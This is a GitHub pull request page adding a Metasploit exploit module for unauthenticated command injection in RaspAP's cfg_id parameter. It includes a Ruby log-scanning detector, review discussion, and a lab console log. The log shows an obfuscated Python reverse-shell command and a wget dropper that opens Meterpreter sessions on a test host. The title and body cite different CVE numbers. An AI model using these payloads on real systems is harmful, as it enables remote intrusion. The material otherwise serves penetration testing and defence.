
Add RaspAP Unauthenticated Command Injection (CVE-2022-39986) Exploit #18263

Merged
merged 17 commits into from Aug 15, 2023

Conversation

EgeBalci

@EgeBalci EgeBalci commented Aug 4, 2023

Hello 👋

This module exploits the unauthenticated command injection vulnerability (CVE-2023-38096) in the raspap-webgui project. The vulnerability exists in RaspAP versions 2.8.0 thru 2.8.7. It allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php.

Testing Environment Setup

For installing the vulnerable version follow the steps below,

  1. Follow the manual installation steps given here
  2. After setting up the service, navigate to the /var/www/html directory
  3. Do git checkout 2.8.0 for switching to the vulnerable version

Note: Project can also be installed inside ubuntu/debian docker containers

Verification

List the steps needed to make sure this thing works

  • msfconsole
  • Do: use exploit/unix/http/raspap_rce
  • Do: set RHOST [IP]
  • Do: set RPORT [PORT]
  • Do: check
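As an added example (not part of the module or the RaspAP project), a defender-side check that scans web-server access logs for requests to the endpoint named above whose cfg_id contains anything outside a plain identifier. It assumes combined log format and that cfg_id arrives in the query string; the sample lines are constructed.

```ruby
# Added detection example, not code from the PR or from RaspAP.
require 'uri'
require 'cgi'

VULN_PATH  = '/ajax/openvpn/activate_ovpncfg.php'
# Assumption: a legitimate cfg_id is a simple identifier; anything else
# (';', '|', '$', whitespace, ...) is what a command-injection payload needs.
ALLOWED_ID = /\A[\w.-]*\z/

# Parse one combined-log-format line into a hash, or nil if it does not match.
def parse_access_line(line)
  m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/)
  return nil unless m
  { ip: m[1], time: m[2], method: m[3], target: m[4], status: m[5].to_i }
end

# True when the request hits the vulnerable path with a non-identifier cfg_id.
def suspicious_ovpn_request?(entry)
  uri = begin
    URI.parse(entry[:target])
  rescue URI::InvalidURIError
    return false
  end
  return false unless uri.path == VULN_PATH
  params = CGI.parse(uri.query.to_s)          # percent-decodes values
  params.fetch('cfg_id', []).any? { |v| v !~ ALLOWED_ID }
end

# Return the parsed entries that look like injection attempts.
def scan_log(lines)
  lines.map { |l| parse_access_line(l) }.compact.select { |e| suspicious_ovpn_request?(e) }
end

# Constructed sample log lines (the second carries "1;id" URL-encoded).
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [14/Aug/2023:20:38:20 -0400] "GET /ajax/openvpn/activate_ovpncfg.php?cfg_id=1 HTTP/1.1" 200 12
  10.0.0.9 - - [14/Aug/2023:20:38:21 -0400] "GET /ajax/openvpn/activate_ovpncfg.php?cfg_id=1%3Bid HTTP/1.1" 200 12
  10.0.0.9 - - [14/Aug/2023:20:38:22 -0400] "GET /index.php HTTP/1.1" 200 500
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG.lines).each { |e| puts "suspicious: #{e[:ip]} #{e[:target]}" }
end
```

If the application sends cfg_id in a POST body, a plain access log will not show it; the same check then has to run on a request-body log or a WAF/proxy capture.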

EgeBalci and others added 4 commits August 7, 2023 22:23
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
EgeBalci and others added 3 commits August 8, 2023 18:37

@jheysel-r7 jheysel-r7 left a comment


Thanks for the great module @EgeBalci, just a couple minor suggestions.

EgeBalci and others added 8 commits August 9, 2023 21:24
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
@jvoisin

jvoisin commented Aug 10, 2023

I haven't looked at the configuration of RaspAP, but if the user under which it's running has blanket sudo permissions, it might be nice to prefix the payload with sudo to get root privileges :>

@EgeBalci

I haven't looked at the configuration of RaspAP, but if the user under which it's running has blanket sudo permissions, it might be nice to prefix the payload with sudo to get root privileges :>

That is not the case for my Ubuntu php7 setup. www-data user is well isolated.

@EgeBalci EgeBalci requested a review from jvoisin August 11, 2023 09:47
@jheysel-r7

Thanks @EgeBalci, the module looks great. I just pushed a quick change to update the documentation file to reflect that the default payload for the Unix Command target now returns a meterpreter session. I'll merge this once the CI tests finish running.

msf6 > use raspap
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                          Disclosure Date  Rank       Check  Description
   -  ----                          ---------------  ----       -----  -----------
   0  exploit/unix/http/raspap_rce  2023-07-31       excellent  Yes    RaspAP Unauthenticated Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/raspap_rce

[*] Using exploit/unix/http/raspap_rce
msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24772 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : debian
OS           : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
Architecture : x64
Meterpreter  : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.130 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(unix/http/raspap_rce) > set target 1
target => 1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper
[*] Using URL: http://172.16.199.1:8080/JosEJoBU0G8v
[*] Client 172.16.199.130 (Wget/1.21.3) requested /JosEJoBU0G8v
[*] Sending payload to 172.16.199.130 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 172.16.199.130
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:49950) at 2023-08-14 20:40:51 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : debian.test.com
OS           : Debian 12.1 (Linux 6.1.0-10-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

@jheysel-r7 jheysel-r7 merged commit 6cf136e into rapid7:master Aug 15, 2023
34 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 15, 2023
@jheysel-r7

Release Notes

This PR adds an unauthenticated command injection module for the RaspAP webgui application.
